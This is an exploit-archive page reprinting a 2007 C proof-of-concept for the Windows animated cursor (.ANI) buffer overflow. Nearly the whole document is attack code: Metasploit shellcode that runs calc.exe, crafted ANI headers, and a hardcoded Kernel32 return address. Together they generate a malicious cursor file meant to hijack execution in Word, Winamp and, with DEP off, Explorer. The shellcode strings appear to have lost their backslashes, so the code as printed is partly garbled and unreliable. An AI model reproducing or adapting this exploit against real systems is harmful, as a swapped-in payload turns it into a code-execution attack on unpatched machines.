MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit
# Published : 2007-04-02
# Author : Marsu
# Previous Title : Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit
# Next Title : IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit

/***************************************************************************
*              MS Windows .ANI File Local Buffer Overflow                  *
*                                                                          *
*                                                                          *
* Credits go to Trirat Puttaraksa cause his PoC inspired this source.      *
* devcode's exploit didnt work for me, so I made my own.                   *
* This exploit launches calc.exe on a lot of app (Word, Winamp, etc...).   *                                       *
* Turn off DEP to get it work on Explorer.                                 *
*                                                                          *
* Tested against Win XP SP2 FR.                                            *
* Have Fun!                                                                *
*                                                                          *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                              *
***************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x26"
"x45x32xe3x83xebxfcxe2xf4xdaxadx76xe3x26x45xb9xa6"
"x1axcex4exe6x5ex44xddx68x69x5dxb9xbcx06x44xd9xaa"
"xadx71xb9xe2xc8x74xf2x7ax8axc1xf2x97x21x84xf8xee"
"x27x87xd9x17x1dx11x16xe7x53xa0xb9xbcx02x44xd9x85"
"xadx49x79x68x79x59x33x08xadx59xb9xe2xcdxccx6exc7"
"x22x86x03x23x42xcex72xd3xa3x85x4axefxadx05x3ex68"
"x56x59x9fx68x4ex4dxd9xeaxadxc5x82xe3x26x45xb9x8b"
"x1ax1ax03x15x46x13xbbx1bxa5x85x49xb3x4ex3bxeax01"
"x55x2dxaax1dxacx4bx65x1cxc1x26x53x8fx45x6bx57x9b"
"x43x45x32xe3";

unsigned char Ani_headers[] = 
"x52x49x46x46x13x03x00x00x41x43x4fx4ex61x6ex69x68"
"x24x00x00x00x24x00x00x00xffxffx00x00x09x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x04x00x00x00x01x00x00x00x54x53x49x4cx03x00x00x00"
"x00x00x00x00x54x53x49x4cx04x00x00x00x02x02x02x02"
"x61x6ex69x68xffxffx00x00";

int main(int argc, char* argv[])
{
	FILE* anifile;
	char evilbuff[66000];
	printf("[+] MS Windows .ANI File Buffer Overflow  n");
	printf("[+] Greetz to Trirat Puttaraksan");
	printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ani>n",argv[0]);
		return 0;
	}
	
	memset(evilbuff,'C',66000);
	memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1);
	memcpy(evilbuff+168,"x7bx1ax80x7c",4); 				/* CALL ESI in Kernel32.dll */
	memcpy(evilbuff+245,CalcShellcode,strlen(CalcShellcode));

	memset(evilbuff+65623,0,1);
	
	if ((anifile=fopen(argv[1],"wb"))==0) {
		printf("[-] Unable to access file.n");
		return 0;
	}
	fwrite( evilbuff, 1, 65623, anifile );
	fclose(anifile);
	printf("[+] Done. Have fun!n");
	return 0;
	
}

// www.Syue.com [2007-04-02]